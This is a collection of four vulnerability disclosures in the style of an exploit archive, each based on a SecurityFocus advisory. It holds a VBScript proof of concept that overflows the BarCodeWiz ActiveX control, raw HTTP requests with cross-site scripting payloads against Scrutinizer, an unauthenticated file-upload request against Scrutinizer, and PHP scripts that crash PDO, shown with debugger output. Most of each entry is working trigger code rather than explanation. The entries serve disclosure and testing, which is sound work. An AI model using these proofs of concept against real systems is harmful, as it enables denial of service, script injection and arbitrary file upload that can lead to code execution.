source: https://www.securityfocus.com/bid/54701/info BarCodeWiz ActiveX control is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input. An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control. Successful exploits will allow attackers to execute arbitrary code within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. BarCodeWiz 4.0.0.0 is vulnerable to this issue; other versions may be affected as well. <html> Exploit <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc' /></object> <script language='vbscript'> targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX Trial\DLL\BarcodeWiz.dll" prototype = "Property Let Barcode As String" memberName = "Barcode" progid = "BARCODEWIZLib.BarCodeWiz" argCount = 1 arg1=String(14356, "A") poc.Barcode = arg1 </script>
-
Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/54725/info Scrutinizer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. #Request 1 GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive #Response 1 <snip> <a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr> <snip> #Request 2 GET /d4d/exporters.php HTTP/1.1 Host: A.B.C.D Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1 Content-Length: 2 #Response 2 <snip> <a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a> <snip>
-
Scrutinizer 9.0.1.19899 - Arbitrary File Upload
source: https://www.securityfocus.com/bid/54726/info Scrutinizer is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. #Request POST /d4d/uploader.php HTTP/1.0 Host: A.B.C.D User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593 Content-Length: 210 --_Part_949_3365333252_3066945593 Content-Disposition: form-data; name="uploadedfile"; filename="trustwave.txt" Content-Type: application/octet-stream trustwave --_Part_949_3365333252_3066945593-- #Response HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:39:15 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 41 Connection: close Content-Type: text/html {"success":1,"file_name":"trustwave.txt"} #Confirming on File System C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt" trustwave
-
PHP 5.4.3 - PDO Memory Access Violation Denial of Service
source: https://www.securityfocus.com/bid/54777/info PHP is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users. PHP 5.4.3 is vulnerable; other versions may also be affected. <?php try { $db = new PDO('mysql:host=localhost;dbname=aws', "root", ""); //tokens: // SELECT;*;from;'user';/* //$sql = "SELECT * from 'user'/*"; $stmt = $db->prepare("SELECT * from 'user'".mysql_real_escape_string($_GET['query'])); $stmt->execute(); //crash $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256); $stmt->fetch(PDO::FETCH_BOUND); print_r( $type); } catch (Exception $e) { echo "Failed: " . $e->getMessage(); } ?> ----- <?php try { $db = new PDO('mysql:host=localhost;dbname=aws', "root", ""); //tokens: // SELECT;*;from;'user';/* $sql = ":/*"; $stmt = $db->prepare($sql); $stmt->execute(); // crashes php worker in pdo_parse_params() $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256); $stmt->fetch(PDO::FETCH_BOUND); print_r( $type); } catch (Exception $e) { echo "Failed: " . $e->getMessage(); } ?> --- <pre> <?php echo "hmm beginning\n"; try { $db = new PDO('mysql:host=localhost;dbname=aws', "root", ""); echo "lets get it on\n"; //tokens: // SELECT;*;from;'user';/* $sql = "SELECT * from user :/**"; echo $sql; $stmt = $db->prepare($sql); echo "prepared :)\n"; print_r($stmt); $stmt->execute(); // crashes php worker in pdo_parse_params() print_r($stmt); echo "executed :(\n"; $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256); $stmt->fetch(PDO::FETCH_BOUND); echo "--data-\n"; print_r( $type); echo "--data--\n"; } catch (Exception $e) { echo "EXCEPTION"; echo "Failed: " . $e->getMessage(); } echo "hmmm end\n"; ?> </pre> Actual result: -------------- root@bt:/opt/lampp# gdb ./bin/php (gdb) run poc_pdo_linux_short_1.php Starting program: /opt/lampp/bin/php /opt/lampp/poc_pdo_linux_short_1.php [Thread debugging using libthread_db enabled] Program received signal SIGSEGV, Segmentation fault. 
0x08228a81 in ?? () (gdb) bt #0 0x08228a81 in ?? () #1 0x082280eb in pdo_parse_params () #2 0x08223891 in ?? () #3 0x084b2aad in ?? () #4 0x084b1f87 in execute () #5 0x08490ed2 in zend_execute_scripts () #6 0x0843f13c in php_execute_script () #7 0x08506b46 in main ()